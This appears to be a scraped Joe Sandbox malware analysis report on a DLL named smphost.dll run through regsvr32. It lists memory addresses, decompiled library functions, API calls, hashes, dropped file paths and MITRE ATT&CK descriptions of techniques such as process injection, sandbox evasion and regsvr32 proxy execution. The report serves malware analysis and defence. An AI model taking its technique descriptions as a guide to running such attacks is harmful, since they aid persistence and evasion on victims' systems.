0x6f6cb60c
0x6f6cb613
0x6f6cb619
0x6f6cb623
0x6f6cb62c
0x6f6cb62c
0x6f6cb623
0x6f6cb619
0x6f6cb62d
0x6f6cb5d9
0x6f6cb5d9
0x6f6cb5d9
0x6f6cb5dc
0x6f6cb5dc
0x6f6cb5e0
0x00000000
0x00000000
0x6f6cb5e4
0x6f6cb5f8
0x6f6cb5f8
0x6f6cb5e6
0x6f6cb5e6
0x6f6cb5ec
0x00000000
0x6f6cb5ee
0x6f6cb5ee
0x6f6cb5f1
0x6f6cb5f6
0x00000000
0x00000000
0x00000000
0x00000000
0x6f6cb5f6
0x6f6cb5ec
0x6f6cb601
0x6f6cb603
0x00000000
0x6f6cb605
0x6f6cb605
0x6f6cb605
0x00000000
0x6f6cb603
0x6f6cb5fc
0x6f6cb5fe
0x00000000
0x6f6cb5fe
0x00000000
0x00000000
0x00000000
0x6f6cb5c9
0x6f6cb5c1
0x6f6cb634
0x6f6cb638
0x6f6cb638

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F6CB49A

Strings

RCC, xrefs: 6F6CB4B4
MOC, xrefs: 6F6CB4AC

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: ba7a78a73ce5fbd7b726927c91c38ed57fc793a4a0541dac9a714c95634da106
Instruction ID: 4d0020e751368361d73f045ec3490c4fce0c93fd79efe4bb2b0672d244e0b99e
Opcode Fuzzy Hash: ba7a78a73ce5fbd7b726927c91c38ed57fc793a4a0541dac9a714c95634da106
Instruction Fuzzy Hash: F3415872900209AFCF05CF94DC80AEE7BB5FF48304F54819AFA54A7255D336AA50DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CF71E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6F6CF71E(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t37;
				signed int _t46;
				char _t49;
				char _t56;
				signed int _t62;
				void* _t73;
				void* _t79;
				signed int _t84;

				_t77 = __edx;
				_push(_a16);
				_push(_a12);
				E6F6CF832(__ebx, __edx, __edi, __esi, __eflags);
				_t37 = E6F6CF4C8(__eflags, _a4);
				_v16 = _t37;
				if(_t37 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t79 = E6F6CE649(0x220);
					_t62 = __ebx | 0xffffffff;
					__eflags = _t79;
					if(__eflags == 0) {
						L5:
						_t84 = _t62;
					} else {
						_t79 = memcpy(_t79,  *(_a12 + 0x48), 0x88 << 2);
						 *_t79 =  *_t79 & 0x00000000;
						_t84 = E6F6CF92D(_t77, __eflags, _v16, _t79);
						__eflags = _t84 - _t62;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E6F6CE8E2();
							}
							asm("lock xadd [eax], ebx");
							_t64 = _t62 == 1;
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								_t56 = _a12;
								__eflags =  *((intOrPtr*)(_t56 + 0x48)) - 0x6f6dc1e0;
								if( *((intOrPtr*)(_t56 + 0x48)) != 0x6f6dc1e0) {
									E6F6CDC0E( *((intOrPtr*)(_t56 + 0x48)));
								}
							}
							 *_t79 = 1;
							_t73 = _t79;
							_t79 = 0;
							 *(_a12 + 0x48) = _t73;
							_t46 =  *0x6f6dc700; // 0xfffffffe
							__eflags =  *(_a12 + 0x350) & _t46;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t49 = 5;
								_v16 = _t49;
								_v12 = _t49;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E6F6CF3BA(_t64, 0, _t84, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x6f6dc1d4 =  *_a16;
								}
							}
						} else {
							 *((intOrPtr*)(E6F6CD46D(__eflags))) = 0x16;
							goto L5;
						}
					}
					E6F6CDC0E(_t79);
					return _t84;
				} else {
					return 0;
				}
			}

0x6f6cf71e
0x6f6cf726
0x6f6cf729
0x6f6cf72c
0x6f6cf734
0x6f6cf73f
0x6f6cf748
0x6f6cf74e
0x6f6cf74f
0x6f6cf750
0x6f6cf75b
0x6f6cf75d
0x6f6cf761
0x6f6cf763
0x6f6cf793
0x6f6cf793
0x6f6cf765
0x6f6cf772
0x6f6cf778
0x6f6cf780
0x6f6cf784
0x6f6cf786
0x6f6cf7a3
0x6f6cf7a7
0x6f6cf7a9
0x6f6cf7a9
0x6f6cf7b4
0x6f6cf7b8
0x6f6cf7b8
0x6f6cf7b9
0x6f6cf7bb
0x6f6cf7be
0x6f6cf7c5
0x6f6cf7ca
0x6f6cf7cf
0x6f6cf7c5
0x6f6cf7d0
0x6f6cf7d6
0x6f6cf7db
0x6f6cf7dd
0x6f6cf7e3
0x6f6cf7e8
0x6f6cf7ee
0x6f6cf7f3
0x6f6cf7fe
0x6f6cf801
0x6f6cf802
0x6f6cf805
0x6f6cf80b
0x6f6cf80f
0x6f6cf813
0x6f6cf814
0x6f6cf819
0x6f6cf81d
0x6f6cf828
0x6f6cf828
0x6f6cf81d
0x6f6cf788
0x6f6cf78d
0x00000000
0x6f6cf78d
0x6f6cf786
0x6f6cf796
0x6f6cf7a2
0x6f6cf74a
0x6f6cf74d
0x6f6cf74d

APIs

Part of subcall function 6F6CF4C8: GetOEMCP.KERNEL32(00000000,6F6CF739,6F6D097D,00000000,00000000,00000000,00000000,?,6F6D097D), ref: 6F6CF4F3

_free.LIBCMT ref: 6F6CF796

Strings

}mo, xrefs: 6F6CF750

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: _free
String ID: }mo
API String ID: 269201875-3130979825
Opcode ID: 30ccdf53a6990ef3b91e44ac174349badf8de3f9abcc7c117808700f2694261a
Instruction ID: 1399e915df6aa0842b662c82c10572081b1e27dd3f9bea5aab95fb7ddb036604
Opcode Fuzzy Hash: 30ccdf53a6990ef3b91e44ac174349badf8de3f9abcc7c117808700f2694261a
Instruction Fuzzy Hash: 05319E7690020AAFDB01DF69D840ACE77F9FF44324F11406AE9519B290EB32E911CB76

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CF4C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F6CF4C8(void* __eflags, int _a4) {
				char _v8;
				char _v16;
				char _v20;
				int _t10;
				void* _t14;

				E6F6CC407( &_v20, _t14, 0);
				 *0x6f6dd9b8 =  *0x6f6dd9b8 & 0x00000000;
				_t10 = _a4;
				if(_t10 != 0xfffffffe) {
					if(_t10 != 0xfffffffd) {
						if(_t10 == 0xfffffffc) {
							_t3 =  &_v16; // 0x6f6d097d
							 *0x6f6dd9b8 = 1;
							_t10 =  *( *_t3 + 8);
						}
					} else {
						 *0x6f6dd9b8 = 1;
						_t10 = GetACP();
					}
				} else {
					 *0x6f6dd9b8 = 1;
					_t10 = GetOEMCP();
				}
				if(_v8 == 0) {
					return _t10;
				} else {
					 *(_v20 + 0x350) =  *(_v20 + 0x350) & 0xfffffffd;
					return _t10;
				}
			}

0x6f6cf4d5
0x6f6cf4da
0x6f6cf4e1
0x6f6cf4e7
0x6f6cf4fe
0x6f6cf515
0x6f6cf517
0x6f6cf51a
0x6f6cf524
0x6f6cf524
0x6f6cf500
0x6f6cf500
0x6f6cf50a
0x6f6cf50a
0x6f6cf4e9
0x6f6cf4e9
0x6f6cf4f3
0x6f6cf4f3
0x6f6cf52b
0x6f6cf538
0x6f6cf52d
0x6f6cf530
0x00000000
0x6f6cf530

APIs

GetOEMCP.KERNEL32(00000000,6F6CF739,6F6D097D,00000000,00000000,00000000,00000000,?,6F6D097D), ref: 6F6CF4F3
GetACP.KERNEL32(00000000,6F6CF739,6F6D097D,00000000,00000000,00000000,00000000,?,6F6D097D), ref: 6F6CF50A

Strings

}mo, xrefs: 6F6CF517

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID:
String ID: }mo
API String ID: 0-3130979825
Opcode ID: ad976a238f5ade1fec456a436589f1fc2c957bd9cd0998ff4e2012520ce2a1c1
Instruction ID: b2d858c288fb42584bde37936b72c38a4a7dcb9fb5b5815edceac6f99cd0ab24
Opcode Fuzzy Hash: ad976a238f5ade1fec456a436589f1fc2c957bd9cd0998ff4e2012520ce2a1c1
Instruction Fuzzy Hash: 8BF04F308086458FDB00DF69D488BAC77B1EB1233DF654344E1658E1D2C772A895CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6F6C9CF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F6C9CF7(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E6F6C9D4A(__ecx);
				 *__ecx = 0x38;
				 *((intOrPtr*)(__ecx + 8)) = 0x6f6c0000;
				 *((intOrPtr*)(__ecx + 4)) = 0x6f6c0000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x6f6d53dc;
				if(E6F6C5D50(__ecx + 0x14) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0x6f6dcb28 = 1;
				}
				return _t13;
			}

0x6f6c9cf8
0x6f6c9cfa
0x6f6c9d04
0x6f6c9d0d
0x6f6c9d10
0x6f6c9d13
0x6f6c9d1a
0x6f6c9d28
0x6f6c9d32
0x6f6c9d39
0x6f6c9d39
0x6f6c9d3f
0x6f6c9d3f
0x6f6c9d49

APIs

Part of subcall function 6F6C5D50: GetLastError.KERNEL32(?,?,?,6F6DA66C), ref: 6F6C5D74

IsDebuggerPresent.KERNEL32(?,?,6F6DA66C,?,?,?,?,?,?,?,00000000,?,6F6D46B0,000000FF,?,6F6C1E0A), ref: 6F6C9D2A
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,6F6DA66C,?,?,?,?,?,?,?,00000000,?,6F6D46B0,000000FF), ref: 6F6C9D39

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6F6C9D34

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: 20cd5a1bacc2b662f30192b1605e5be435fae9b527f5b89811739510492c8259
Instruction ID: 43e31ac89d75d96e93b5b6322bfbc44260f181a602402e94ca06447ffa61a4ed
Opcode Fuzzy Hash: 20cd5a1bacc2b662f30192b1605e5be435fae9b527f5b89811739510492c8259
Instruction Fuzzy Hash: 55E06D70100B008FD3208F2DC4043467BE0EF0632CF418A1DE496D7A44E7B0E8888BA6

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report smphost.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary

Persistence and Installation Behavior

Jbx Signature Overview

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\6\5507.ocx

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_6a6ca821ebbab05224d67cc3f7b1b60df6be9b5_7a325c51_102a2f91\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER16CB.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CD7.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB43.tmp.dmp

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Windows Analysis Report
smphost.dll

Function 6E9E93FD Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6E9E5D90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 193
libraryCOMMON

Function 6E9E94AD Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6E9E8A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96
sleepCOMMON

Function 6E9EFD93 Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Function 6E9E92F6 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6E9EE509 Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Function 6E9ECC7D Relevance: 3.0, APIs: 2, Instructions: 31
COMMON